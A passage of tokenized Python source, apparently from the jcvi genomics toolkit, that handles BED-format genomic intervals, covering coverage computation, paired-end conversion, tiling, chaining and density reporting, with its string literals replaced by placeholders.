exit ( ) <EOL> with open ( opts . input_file_list , '<STR_LIT:r>' ) as f : <EOL> file_list = f . read ( ) . splitlines ( ) <EOL> elif opts . input_folder : <EOL> if not op . isdir ( opts . input_folder ) : <EOL> logging . error ( "<STR_LIT>" . format ( opts . input_folder ) ) <EOL> sys . exit ( ) <EOL> file_list = [ file for file in os . listdir ( opts . input_folder ) if file . lower ( ) . endswith ( '<STR_LIT>' ) or file . lower ( ) . endswith ( '<STR_LIT>' ) ] <EOL> folder = opts . input_folder <EOL> folder = folder . rstrip ( '<STR_LIT:/>' ) <EOL> for i in xrange ( len ( file_list ) ) : <EOL> file_list [ i ] = folder + "<STR_LIT:/>" + file_list [ i ] <EOL> elif opts . input_file : <EOL> file_list . append ( opts . input_file ) <EOL> else : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( not p . print_help ( ) ) <EOL> if len ( file_list ) == <NUM_LIT:0> : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> for file in file_list : <EOL> if not op . isfile ( file ) : <EOL> logging . warning ( "<STR_LIT>" . format ( file ) ) <EOL> else : <EOL> cmd = "<STR_LIT>" . format ( file , opts . max_gap_len , opts . ovl_pct_id , opts . ovl_sim_score , opts . prefix ) <EOL> if opts . extra : <EOL> cmd += "<STR_LIT>" . format ( opts . extra ) <EOL> logfile = "<STR_LIT>" . format ( file , opts . prefix ) <EOL> sh ( cmd , outfile = logfile ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os . path as op <EOL> import sys <EOL> import logging <EOL> from collections import defaultdict <EOL> from jcvi . formats . base import BaseFile , must_open <EOL> from jcvi . formats . fasta import gaps <EOL> from jcvi . formats . sizes import Sizes <EOL> from jcvi . formats . posmap import query , bed <EOL> from jcvi . formats . bed import BedLine , sort <EOL> from jcvi . apps . base import OptionParser , ActionDispatcher , sh , need_update <EOL> class Coverage ( BaseFile ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , bedfile , sizesfile ) : <EOL> bedfile = sort ( [ bedfile ] ) <EOL> coveragefile = bedfile + "<STR_LIT>" <EOL> if need_update ( bedfile , coveragefile ) : <EOL> cmd = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( bedfile , sizesfile ) <EOL> sh ( cmd , outfile = coveragefile ) <EOL> self . sizes = Sizes ( sizesfile ) . mapping <EOL> filename = coveragefile <EOL> assert filename . endswith ( "<STR_LIT>" ) <EOL> super ( Coverage , self ) . __init__ ( filename ) <EOL> def get_plot_data ( self , ctg , bins = None ) : <EOL> import numpy as np <EOL> from jcvi . algorithms . matrix import chunk_average <EOL> fp = open ( self . filename ) <EOL> size = self . sizes [ ctg ] <EOL> data = np . zeros ( ( size , ) , dtype = np . int ) <EOL> for row in fp : <EOL> seqid , start , end , cov = row . split ( ) <EOL> if seqid != ctg : <EOL> continue <EOL> start , end = int ( start ) , int ( end ) <EOL> cov = int ( cov ) <EOL> data [ start : end ] = cov <EOL> bases = np . arange ( <NUM_LIT:1> , size + <NUM_LIT:1> ) <EOL> if bins : <EOL> window = size / bins <EOL> bases = bases [ : : window ] <EOL> data = chunk_average ( data , window ) <EOL> return bases , data <EOL> def main ( ) : <EOL> actions = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> p = ActionDispatcher ( actions ) <EOL> p . dispatch ( globals ( ) ) <EOL> def clone_name ( s , ca = False ) : <EOL> """<STR_LIT>""" <EOL> if not ca : <EOL> return s [ : - <NUM_LIT:1> ] <EOL> if s [ <NUM_LIT:0> ] == '<STR_LIT:1>' : <EOL> return s [ <NUM_LIT:2> : ] <EOL> return s . rstrip ( '<STR_LIT>' ) <EOL> def bed_to_bedpe ( bedfile , bedpefile , pairsbedfile = None , matesfile = None , ca = False ) : <EOL> """<STR_LIT>""" <EOL> fp = must_open ( bedfile ) <EOL> fw = must_open ( bedpefile , "<STR_LIT:w>" ) <EOL> if pairsbedfile : <EOL> fwpairs = must_open ( pairsbedfile , "<STR_LIT:w>" ) <EOL> clones = defaultdict ( list ) <EOL> for row in fp : <EOL> b = BedLine ( row ) <EOL> name = b . accn <EOL> clonename = clone_name ( name , ca = ca ) <EOL> clones [ clonename ] . append ( b ) <EOL> if matesfile : <EOL> fp = open ( matesfile ) <EOL> libraryline = fp . next ( ) <EOL> lib , name , smin , smax = libraryline . split ( ) <EOL> assert lib == "<STR_LIT>" <EOL> smin , smax = int ( smin ) , int ( smax ) <EOL> logging . debug ( "<STR_LIT>" . format ( name , smin , smax ) ) <EOL> nbedpe = <NUM_LIT:0> <EOL> nspan = <NUM_LIT:0> <EOL> for clonename , blines in clones . items ( ) : <EOL> if len ( blines ) == <NUM_LIT:2> : <EOL> a , b = blines <EOL> aseqid , astart , aend = a . seqid , a . start , a . end <EOL> bseqid , bstart , bend = b . seqid , b . start , b . end <EOL> print >> fw , "<STR_LIT:\t>" . join ( str ( x ) for x in ( aseqid , astart - <NUM_LIT:1> , aend , <EOL> bseqid , bstart - <NUM_LIT:1> , bend , clonename ) ) <EOL> nbedpe += <NUM_LIT:1> <EOL> else : <EOL> a , = blines <EOL> aseqid , astart , aend = a . seqid , a . start , a . end <EOL> bseqid , bstart , bend = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> if pairsbedfile : <EOL> start = min ( astart , bstart ) if bstart > <NUM_LIT:0> else astart <EOL> end = max ( aend , bend ) if bend > <NUM_LIT:0> else aend <EOL> if aseqid != bseqid : <EOL> continue <EOL> span = end - start + <NUM_LIT:1> <EOL> if ( not matesfile ) or ( smin <= span <= smax ) : <EOL> print >> fwpairs , "<STR_LIT:\t>" . join ( str ( x ) for x in ( aseqid , start - <NUM_LIT:1> , end , clonename ) ) <EOL> nspan += <NUM_LIT:1> <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( nbedpe , bedpefile ) ) <EOL> if pairsbedfile : <EOL> fwpairs . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( nspan , pairsbedfile ) ) <EOL> def posmap ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( posmap . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:3> : <EOL> sys . exit ( p . print_help ( ) ) <EOL> frgscffile , fastafile , scf = args <EOL> cmd = "<STR_LIT>" . format ( fastafile , scf ) <EOL> scffastafile = scf + "<STR_LIT>" <EOL> if not op . exists ( scffastafile ) : <EOL> sh ( cmd , outfile = scffastafile ) <EOL> sizesfile = scffastafile + "<STR_LIT>" <EOL> sizes = Sizes ( scffastafile ) . mapping <EOL> scfsize = sizes [ scf ] <EOL> logging . debug ( "<STR_LIT>" . format ( scf , scfsize ) ) <EOL> gapsbedfile = scf + "<STR_LIT>" <EOL> if not op . exists ( gapsbedfile ) : <EOL> args = [ scffastafile , "<STR_LIT>" , "<STR_LIT>" ] <EOL> gaps ( args ) <EOL> posmapfile = scf + "<STR_LIT>" <EOL> if not op . exists ( posmapfile ) : <EOL> args = [ frgscffile , scf ] <EOL> query ( args ) <EOL> bedfile = scf + "<STR_LIT>" <EOL> if not op . exists ( bedfile ) : <EOL> args = [ posmapfile ] <EOL> bed ( args ) <EOL> bedpefile = scf + "<STR_LIT>" <EOL> pairsbedfile = scf + "<STR_LIT>" <EOL> if not ( op . exists ( bedpefile ) and op . exists ( pairsbedfile ) ) : <EOL> bed_to_bedpe ( bedfile , bedpefile , pairsbedfile = pairsbedfile , ca = True ) <EOL> Coverage ( bedfile , sizesfile ) <EOL> Coverage ( pairsbedfile , sizesfile ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import os . path as op <EOL> import sys <EOL> import math <EOL> import logging <EOL> import numpy as np <EOL> from collections import defaultdict <EOL> from itertools import groupby <EOL> from jcvi . formats . base import LineFile , must_open , is_number , get_number <EOL> from jcvi . formats . sizes import Sizes <EOL> from jcvi . utils . iter import pairwise <EOL> from jcvi . utils . cbook import SummaryStats , thousands , percentage <EOL> from jcvi . utils . grouper import Grouper <EOL> from jcvi . utils . natsort import natsort_key , natsorted <EOL> from jcvi . utils . range import Range , range_union , range_chain , range_distance , range_intersect <EOL> from jcvi . apps . base import OptionParser , ActionDispatcher , sh , need_update , popen <EOL> class BedLine ( object ) : <EOL> __slots__ = ( "<STR_LIT>" , "<STR_LIT:start>" , "<STR_LIT:end>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:args>" , "<STR_LIT>" ) <EOL> def __init__ ( self , sline ) : <EOL> args = sline . strip ( ) . split ( "<STR_LIT:\t>" ) <EOL> self . nargs = nargs = len ( args ) <EOL> self . seqid = args [ <NUM_LIT:0> ] <EOL> self . start = int ( args [ <NUM_LIT:1> ] ) + <NUM_LIT:1> <EOL> self . end = int ( args [ <NUM_LIT:2> ] ) <EOL> assert self . start <= self . end , "<STR_LIT>" . format ( self . start , self . end ) <EOL> self . extra = self . accn = self . score = self . strand = None <EOL> if nargs > <NUM_LIT:3> : <EOL> self . accn = args [ <NUM_LIT:3> ] <EOL> if nargs > <NUM_LIT:4> : <EOL> self . score = args [ <NUM_LIT:4> ] <EOL> if nargs > <NUM_LIT:5> : <EOL> self . strand = args [ <NUM_LIT:5> ] <EOL> if nargs > <NUM_LIT:6> : <EOL> self . extra = args [ <NUM_LIT:6> : ] <EOL> self . args = args <EOL> def __str__ ( self ) : <EOL> args = [ self . seqid , self . start - <NUM_LIT:1> , self . end ] <EOL> if self . accn is not None : <EOL> args += [ self . accn ] <EOL> if self . score is not None : <EOL> args += [ self . score ] <EOL> if self . strand is not None : <EOL> args += [ self . strand ] <EOL> if self . extra is not None : <EOL> args += self . extra <EOL> s = "<STR_LIT:\t>" . join ( str ( x ) for x in args ) <EOL> return s <EOL> __repr__ = __str__ <EOL> def __getitem__ ( self , key ) : <EOL> return getattr ( self , key ) <EOL> @ property <EOL> def span ( self ) : <EOL> return self . end - self . start + <NUM_LIT:1> <EOL> @ property <EOL> def range ( self ) : <EOL> strand = self . strand or '<STR_LIT:+>' <EOL> return ( self . seqid , self . start , self . end , strand ) <EOL> @ property <EOL> def tag ( self ) : <EOL> return "<STR_LIT>" . format ( self . seqid , self . start , self . end ) <EOL> def gffline ( self , type = '<STR_LIT>' , source = '<STR_LIT:default>' ) : <EOL> score = "<STR_LIT:.>" if not self . score or ( self . score and not is_number ( self . score ) ) else self . score <EOL> strand = "<STR_LIT:.>" if not self . strand else self . strand <EOL> row = "<STR_LIT:\t>" . join ( ( self . seqid , source , type , <EOL> str ( self . start ) , str ( self . end ) , score , <EOL> strand , '<STR_LIT:.>' , '<STR_LIT>' + self . accn ) ) <EOL> return row <EOL> class Bed ( LineFile ) : <EOL> def __init__ ( self , filename = None , key = None , sorted = True , juncs = False ) : <EOL> super ( Bed , self ) . __init__ ( filename ) <EOL> self . nullkey = lambda x : ( natsort_key ( x . seqid ) , x . start , x . accn ) <EOL> self . key = key or self . nullkey <EOL> if not filename : <EOL> return <EOL> for line in must_open ( filename ) : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:#>" or ( juncs and line . startswith ( '<STR_LIT>' ) ) : <EOL> continue <EOL> self . append ( BedLine ( line ) ) <EOL> if sorted : <EOL> self . sort ( key = self . key ) <EOL> def add ( self , row ) : <EOL> self . append ( BedLine ( row ) ) <EOL> def print_to_file ( self , filename = "<STR_LIT>" , sorted = False ) : <EOL> if sorted : <EOL> self . sort ( key = self . key ) <EOL> fw = must_open ( filename , "<STR_LIT:w>" ) <EOL> for b in self : <EOL> if b . start < <NUM_LIT:1> : <EOL> logging . error ( "<STR_LIT>" . format ( b . accn ) ) <EOL> b . start = <NUM_LIT:1> <EOL> print >> fw , b <EOL> fw . close ( ) <EOL> def sum ( self , seqid = None , unique = True ) : <EOL> return bed_sum ( self , seqid = seqid , unique = unique ) <EOL> @ property <EOL> def seqids ( self ) : <EOL> return natsorted ( set ( b . seqid for b in self ) ) <EOL> @ property <EOL> def accns ( self ) : <EOL> return natsorted ( set ( b . accn for b in self ) ) <EOL> @ property <EOL> def order ( self ) : <EOL> return dict ( ( f . accn , ( i , f ) ) for ( i , f ) in enumerate ( self ) ) <EOL> @ property <EOL> def order_in_chr ( self ) : <EOL> res = { } <EOL> self . sort ( key = self . nullkey ) <EOL> for seqid , beds in groupby ( self , key = lambda x : x . seqid ) : <EOL> for i , f in enumerate ( beds ) : <EOL> res [ f . accn ] = ( seqid , i , f ) <EOL> return res <EOL> @ property <EOL> def bp_in_chr ( self ) : <EOL> res = { } <EOL> self . sort ( key = self . nullkey ) <EOL> for seqid , beds in groupby ( self , key = lambda x : x . seqid ) : <EOL> for i , f in enumerate ( beds ) : <EOL> res [ f . accn ] = ( seqid , ( f . start + f . end ) / <NUM_LIT:2> , f ) <EOL> return res <EOL> @ property <EOL> def simple_bed ( self ) : <EOL> return [ ( b . seqid , i ) for ( i , b ) in enumerate ( self ) ] <EOL> @ property <EOL> def links ( self ) : <EOL> r = [ ] <EOL> for s , sb in self . sub_beds ( ) : <EOL> for a , b in pairwise ( sb ) : <EOL> r . append ( ( ( a . accn , a . strand ) , ( b . accn , b . strand ) ) ) <EOL> return r <EOL> def extract ( self , seqid , start , end ) : <EOL> for b in self : <EOL> if b . seqid != seqid : <EOL> continue <EOL> if b . start < start or b . end > end : <EOL> continue <EOL> yield b <EOL> def sub_bed ( self , seqid ) : <EOL> for b in self : <EOL> if b . seqid == seqid : <EOL> yield b <EOL> def sub_beds ( self ) : <EOL> self . sort ( key = self . nullkey ) <EOL> for bs , sb in groupby ( self , key = lambda x : x . seqid ) : <EOL> yield bs , list ( sb ) <EOL> def get_breaks ( self ) : <EOL> simple_bed = self . simple_bed <EOL> for seqid , ranks in groupby ( simple_bed , key = lambda x : x [ <NUM_LIT:0> ] ) : <EOL> ranks = list ( ranks ) <EOL> yield seqid , ranks [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , ranks [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> class BedpeLine ( object ) : <EOL> def __init__ ( self , sline ) : <EOL> args = sline . strip ( ) . split ( "<STR_LIT:\t>" ) <EOL> self . seqid1 = args [ <NUM_LIT:0> ] <EOL> self . start1 = int ( args [ <NUM_LIT:1> ] ) + <NUM_LIT:1> <EOL> self . end1 = int ( args [ <NUM_LIT:2> ] ) <EOL> self . seqid2 = args [ <NUM_LIT:3> ] <EOL> self . start2 = int ( args [ <NUM_LIT:4> ] ) + <NUM_LIT:1> <EOL> self . end2 = int ( args [ <NUM_LIT:5> ] ) <EOL> self . accn = args [ <NUM_LIT:6> ] <EOL> self . score = args [ <NUM_LIT:7> ] <EOL> self . strand1 = args [ <NUM_LIT:8> ] <EOL> self . strand2 = args [ <NUM_LIT:9> ] <EOL> self . isdup = False <EOL> @ property <EOL> def innerdist ( self ) : <EOL> if self . seqid1 != self . seqid2 : <EOL> return - <NUM_LIT:1> <EOL> return abs ( self . start2 - self . end1 ) <EOL> @ property <EOL> def outerdist ( self ) : <EOL> if self . seqid1 != self . seqid2 : <EOL> return - <NUM_LIT:1> <EOL> return abs ( self . end2 - self . start1 ) <EOL> @ property <EOL> def is_innie ( self ) : <EOL> return ( self . strand1 , self . strand2 ) == ( '<STR_LIT:+>' , '<STR_LIT:->' ) <EOL> def rc ( self ) : <EOL> self . strand1 = '<STR_LIT:+>' if self . strand1 == '<STR_LIT:->' else '<STR_LIT:->' <EOL> self . strand2 = '<STR_LIT:+>' if self . strand2 == '<STR_LIT:->' else '<STR_LIT:->' <EOL> def _extend ( self , rlen , size , start , end , strand ) : <EOL> if strand == '<STR_LIT:+>' : <EOL> end = start + rlen - <NUM_LIT:1> <EOL> if end > size : <EOL> end = size <EOL> start = end - rlen + <NUM_LIT:1> <EOL> else : <EOL> start = end - rlen + <NUM_LIT:1> <EOL> if start < <NUM_LIT:1> : <EOL> start = <NUM_LIT:1> <EOL> end = start + rlen - <NUM_LIT:1> <EOL> return start , end , strand <EOL> def extend ( self , rlen , size ) : <EOL> self . start1 , self . end1 , self . strand1 = self . _extend ( rlen , size , self . start1 , self . end1 , self . strand1 ) <EOL> self . start2 , self . end2 , self . strand2 = self . _extend ( rlen , size , self . start2 , self . end2 , self . strand2 ) <EOL> def __str__ ( self ) : <EOL> args = ( self . seqid1 , self . start1 - <NUM_LIT:1> , self . end1 , <EOL> self . seqid2 , self . start2 - <NUM_LIT:1> , self . end2 , <EOL> self . accn , self . score , self . strand1 , self . strand2 ) <EOL> return "<STR_LIT:\t>" . join ( str ( x ) for x in args ) <EOL> @ property <EOL> def bedline ( self ) : <EOL> assert self . seqid1 == self . seqid2 <EOL> assert self . start1 <= self . end2 <EOL> args = ( self . seqid1 , self . start1 - <NUM_LIT:1> , self . end2 , self . accn ) <EOL> return "<STR_LIT:\t>" . join ( str ( x ) for x in args ) <EOL> class BedEvaluate ( object ) : <EOL> def __init__ ( self , TPbed , FPbed , FNbed , TNbed ) : <EOL> self . TP = Bed ( TPbed ) . sum ( unique = True ) <EOL> self . FP = Bed ( FPbed ) . sum ( unique = True ) <EOL> self . FN = Bed ( FNbed ) . sum ( unique = True ) <EOL> self . TN = Bed ( TNbed ) . sum ( unique = True ) <EOL> def __str__ ( self ) : <EOL> from jcvi . utils . table import tabulate <EOL> table = { } <EOL> table [ ( "<STR_LIT>" , "<STR_LIT>" ) ] = self . TP <EOL> table [ ( "<STR_LIT>" , "<STR_LIT>" ) ] = self . FP <EOL> table [ ( "<STR_LIT>" , "<STR_LIT>" ) ] = self . FN <EOL> table [ ( "<STR_LIT>" , "<STR_LIT>" ) ] = self . TN <EOL> msg = str ( tabulate ( table ) ) <EOL> msg += "<STR_LIT>" . format ( self . sensitivity * <NUM_LIT:100> ) <EOL> msg += "<STR_LIT>" . format ( self . specificity * <NUM_LIT:100> ) <EOL> msg += "<STR_LIT>" . format ( self . accuracy * <NUM_LIT:100> ) <EOL> return msg <EOL> @ property <EOL> def sensitivity ( self ) : <EOL> if self . TP + self . FN == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return self . TP * <NUM_LIT:1.> / ( self . TP + self . FN ) <EOL> @ property <EOL> def specificity ( self ) : <EOL> if self . TP + self . FP == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return self . TP * <NUM_LIT:1.> / ( self . TP + self . FP ) <EOL> @ property <EOL> def accuracy ( self ) : <EOL> if self . TP + self . FP + self . FN + self . TN == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> return ( self . TP + self . TN ) * <NUM_LIT:1.> / ( self . TP + self . FP + self . FN + self . TN ) <EOL> @ property <EOL> def score ( self ) : <EOL> return "<STR_LIT:|>" . join ( ( "<STR_LIT>" . format ( x ) for x in ( self . sensitivity , self . specificity , self . accuracy ) ) ) <EOL> class BedSummary ( object ) : <EOL> def __init__ ( self , bed ) : <EOL> mspans = [ ( x . span , x . accn ) for x in bed ] <EOL> spans , accns = zip ( * mspans ) <EOL> self . mspans = mspans <EOL> self . stats = SummaryStats ( spans ) <EOL> self . nseqids = len ( set ( x . seqid for x in bed ) ) <EOL> self . nfeats = len ( bed ) <EOL> self . total_bases = bed_sum ( bed , unique = False ) <EOL> self . unique_bases = bed_sum ( bed ) <EOL> self . coverage = self . total_bases * <NUM_LIT:1.> / self . unique_bases <EOL> def report ( self ) : <EOL> print >> sys . stderr , "<STR_LIT>" . format ( self . nseqids ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( self . nfeats ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( thousands ( self . unique_bases ) ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( thousands ( self . total_bases ) ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( self . coverage ) <EOL> print >> sys . stderr , self . stats <EOL> maxspan , maxaccn = max ( self . mspans ) <EOL> minspan , minaccn = min ( self . mspans ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( maxaccn , maxspan ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( minaccn , minspan ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT:\t>" . join ( str ( x ) for x in ( self . nfeats , self . unique_bases ) ) <EOL> def bed_sum ( beds , seqid = None , unique = True ) : <EOL> if seqid : <EOL> ranges = [ ( x . seqid , x . start , x . end ) for x in beds if x . seqid == seqid ] <EOL> else : <EOL> ranges = [ ( x . seqid , x . start , x . end ) for x in beds ] <EOL> unique_sum = range_union ( ranges ) <EOL> raw_sum = sum ( x . span for x in beds ) <EOL> return unique_sum if unique else raw_sum <EOL> def main ( ) : <EOL> actions = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> p = ActionDispatcher ( actions ) <EOL> p . dispatch ( globals ( ) ) <EOL> def filterbedgraph ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( filterbedgraph . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedgraphfile , cutoff = args <EOL> c = float ( cutoff ) <EOL> fp = open ( bedgraphfile ) <EOL> pf = bedgraphfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> filteredbed = pf + "<STR_LIT>" . format ( cutoff ) <EOL> fw = open ( filteredbed , "<STR_LIT:w>" ) <EOL> nfiltered = ntotal = <NUM_LIT:0> <EOL> for row in fp : <EOL> b = BedLine ( row ) <EOL> ntotal += <NUM_LIT:1> <EOL> if float ( b . accn ) >= c : <EOL> print >> fw , b <EOL> nfiltered += <NUM_LIT:1> <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( nfiltered , ntotal ) , cutoff , filteredbed ) ) <EOL> mergeBed ( filteredbed , sorted = True , delim = None ) <EOL> def tiling ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( tiling . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_verbose ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> ov = opts . overlap <EOL> bed = Bed ( bedfile ) <EOL> inf = len ( bed ) <EOL> selected = Bed ( ) <EOL> for seqid , sbed in bed . sub_beds ( ) : <EOL> g = Grouper ( ) <EOL> current = sbed [ <NUM_LIT:0> ] <EOL> for a in sbed : <EOL> g . join ( a ) <EOL> if a . start < current . end - ov : <EOL> g . join ( a , current ) <EOL> if a . end > current . end : <EOL> current = a <EOL> for gbed in g : <EOL> end = max ( x . end for x in gbed ) <EOL> gbed . sort ( key = lambda x : ( x . start , - x . end ) ) <EOL> entries = len ( gbed ) <EOL> counts = [ inf ] * entries <EOL> counts [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> traceback = [ - <NUM_LIT:1> ] * entries <EOL> for i , a in enumerate ( gbed ) : <EOL> for j in xrange ( i + <NUM_LIT:1> , entries ) : <EOL> b = gbed [ j ] <EOL> if b . start >= a . end - ov : <EOL> break <EOL> if counts [ i ] + <NUM_LIT:1> < counts [ j ] : <EOL> counts [ j ] = counts [ i ] + <NUM_LIT:1> <EOL> traceback [ j ] = i <EOL> endi = [ i for i , a in enumerate ( gbed ) if a . end == end ] <EOL> last = min ( ( traceback [ i ] , i ) for i in endi ) [ <NUM_LIT:1> ] <EOL> chain = [ ] <EOL> while last != - <NUM_LIT:1> : <EOL> chain . append ( last ) <EOL> last = traceback [ last ] <EOL> chain = chain [ : : - <NUM_LIT:1> ] <EOL> selected . extend ( [ gbed [ x ] for x in chain ] ) <EOL> if opts . verbose : <EOL> print counts <EOL> print traceback <EOL> print chain <EOL> print "<STR_LIT:\n>" . join ( str ( x ) for x in gbed ) <EOL> print "<STR_LIT:*>" * <NUM_LIT:30> <EOL> print "<STR_LIT:\n>" . join ( str ( gbed [ x ] ) for x in chain ) <EOL> print <EOL> tilingbedfile = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> selected . print_to_file ( filename = tilingbedfile , sorted = True ) <EOL> logging . debug ( "<STR_LIT>" . format ( len ( selected ) , tilingbedfile ) ) <EOL> def chain ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( chain . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT> , help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> cmd = "<STR_LIT>" . format ( bedfile ) <EOL> sh ( cmd ) <EOL> bed = Bed ( bedfile , sorted = False ) <EOL> newbed = Bed ( ) <EOL> for accn , bb in groupby ( bed , key = lambda x : x . accn ) : <EOL> bb = list ( bb ) <EOL> g = Grouper ( ) <EOL> for a in bb : <EOL> g . join ( a ) <EOL> for a , b in pairwise ( bb ) : <EOL> if a . seqid == b . seqid and b . start - a . end < opts . dist : <EOL> g . join ( a , b ) <EOL> data = [ ] <EOL> for p in g : <EOL> seqid = p [ <NUM_LIT:0> ] . seqid <EOL> start = min ( x . start for x in p ) <EOL> end = max ( x . end for x in p ) <EOL> score = sum ( x . span for x in p ) <EOL> data . append ( ( seqid , start - <NUM_LIT:1> , end , accn , score ) ) <EOL> d = max ( data , key = lambda x : x [ - <NUM_LIT:1> ] ) <EOL> newbed . append ( BedLine ( "<STR_LIT:\t>" . join ( str ( x ) for x in d ) ) ) <EOL> newbed . print_to_file ( opts . outfile , sorted = True ) <EOL> def density ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( density . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , fastafile = args <EOL> bed = Bed ( bedfile ) <EOL> sizes = Sizes ( fastafile ) . mapping <EOL> header = "<STR_LIT>" . split ( ) <EOL> print "<STR_LIT:\t>" . join ( header ) <EOL> for seqid , bb in bed . sub_beds ( ) : <EOL> nfeats = len ( bb ) <EOL> size = sizes [ seqid ] <EOL> ds = nfeats * <NUM_LIT> / size <EOL> print "<STR_LIT:\t>" . join ( str ( x ) for x in ( seqid , nfeats , size , "<STR_LIT>" . format ( ds ) ) ) <EOL> def clr ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( clr . __doc__ ) <EOL> p . set_bedpe ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedpe , ref = args <EOL> if bedpe . endswith ( "<STR_LIT>" ) : <EOL> bedpefile = bedpe . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if need_update ( bedpe , bedpefile ) : <EOL> cmd = "<STR_LIT>" . format ( bedpe ) <EOL> sh ( cmd , outfile = bedpefile ) <EOL> bedpe = bedpefile <EOL> filtered = bedpe + "<STR_LIT>" <EOL> if need_update ( bedpe , filtered ) : <EOL> filter_bedpe ( bedpe , filtered , ref , rc = opts . rc , <EOL> minlen = opts . minlen , maxlen = opts . maxlen ) <EOL> rmdup = filtered + "<STR_LIT>" <EOL> if need_update ( filtered , rmdup ) : <EOL> rmdup_bedpe ( filtered , rmdup , dupwiggle = opts . dup ) <EOL> converted = rmdup + "<STR_LIT>" <EOL> if need_update ( rmdup , converted ) : <EOL> fp = open ( rmdup ) <EOL> fw = open ( converted , 